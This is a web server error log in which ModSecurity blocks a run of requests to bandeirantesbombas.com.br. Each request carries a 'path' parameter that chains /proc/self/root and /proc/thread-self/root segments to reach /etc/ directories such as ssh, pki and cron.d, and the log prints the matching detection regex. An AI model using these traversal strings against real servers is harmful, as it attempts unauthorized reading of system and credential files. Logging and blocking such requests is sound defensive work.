[Wed Mar 18 05:40:20.081667 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.241.31:58614] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk9AkwaGbbGflqUZDeFgAAANU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:20.407235 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:53448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk9OyqAr6etmhZHNqH6QAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:21.742097 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.243.128:53460] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk9eoXxyEfFpUF8f85qAAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:23.835405 2026] [:error] [pid 11816:tid 140411649607424] [client 74.7.243.128:53470] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk9-w_le52K8_3pV2tnQAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:25.171708 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:53480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk-cdf6f5d65gmYZSeowAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:27.561555 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:53488] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk--oXxyEfFpUF8f85qwAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:29.283639 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:53494] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk_Mdf6f5d65gmYZSepwAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:30.642288 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:42062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpk_uw_le52K8_3pV2toAAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:33.382159 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:42070] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplASmAPhZkrhU8w4k7pgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:34.751233 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:42078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplAgkwaGbbGflqUZDeGwAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:37.375295 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.241.31:42784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplBdY0UrI5A3LftIxjgQAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:40:37.427375 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.243.128:42090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplBew_le52K8_3pV2towAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:38.775188 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:42092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplBgkwaGbbGflqUZDeHgAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:41.224779 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:48792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplCfu8EFLIOrSqIpvS2AAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:46.065990 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:48808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplDtY0UrI5A3LftIxjhgAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:53.445766 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:48810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplFcdf6f5d65gmYZSeuwAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:40:59.019687 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:40260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplG8df6f5d65gmYZSewAAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:41:04.903376 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.241.31:40668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplINa6ubjKNq_cu4ZivQAAA1U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:41:19.509961 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.241.31:40682] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplL_u8EFLIOrSqIpvS8AAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:41:28.060596 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:57346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplOOw_le52K8_3pV2ttwAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:41:44.010384 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:55182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abplRkzinOy1jxa1j4ffbQAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
